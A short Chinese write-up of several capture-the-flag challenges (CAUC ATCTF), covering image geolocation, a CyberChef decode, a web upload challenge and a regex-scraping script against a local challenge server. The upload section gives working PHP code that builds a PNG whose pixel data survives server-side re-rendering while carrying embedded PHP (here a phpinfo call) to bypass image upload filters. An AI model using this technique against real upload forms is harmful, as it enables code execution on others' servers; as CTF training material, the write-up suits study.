CAUC ATCTF WP

CAUC ATCTF WP

我在xx很想你

百度谷歌没识图出来，结果在小红书上识别出来在汕头，再细化搜索发现是广东省汕头市南澳省

一眼爆了

cyberchef直接解出

image?

二次渲染绕过 · GitBook

经过提示，绕过二次渲染

<?php 
$a='cX<?PHP PHPINFO();?>X'.urldecode('%00').urldecode('%00');

$payload_ascii='';
for($i=0;$i<strlen($a);$i++){
    $payload_ascii.=bin2hex($a[$i]);
}

$payload_hex=bin2hex(gzinflate(hex2bin($payload_ascii)));

// echo $payload_hex."\n";
preg_match_all('/[a-z0-9]{2}/', $payload_hex, $matches);

$blist=[];

foreach($matches[0] as $key => $value){
    $blist[$key]=base_convert($value, 16, 10);
}

function filter1($blist){
    for($i=0; $i<(count($blist)-3);$i++){
        $blist[$i+3] = ($blist[$i+3] + $blist[$i]) %256;
    }
    return array_values($blist);
}

function filter3($blist){
    for($i=0; $i<(count($blist)-3);$i++){
        $blist[$i+3] = ($blist[$i+3] + floor($blist[$i]/2) ) %256;
    }
    return array_values($blist);
}
$p=array_merge(filter1($blist), filter3($blist));
$img = imagecreatetruecolor(32, 32);

// echo sizeof($p);
for ($y = 0; $y < sizeof($p)-3; $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   // echo $color;
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');

上传构造的png图片

在phpinfo中有flag

sign in

由秋名山车神

构造正则表达式获取题目数，随后正则匹配，再将这个数据（num）上传,获得正确alert

import re
import requests

url="http://127.0.0.1:59793"
s = requests.session()
r = s.get(url)
text = r.text
pattern = r"刷(\d+)道题"
match = re.search(pattern, text)
number_of_questions = match.group(1)
data = {
    "num": number_of_questions
}
r_post = s.post(url, data=data)
print(f"返回的结果:\n{r_post.text}")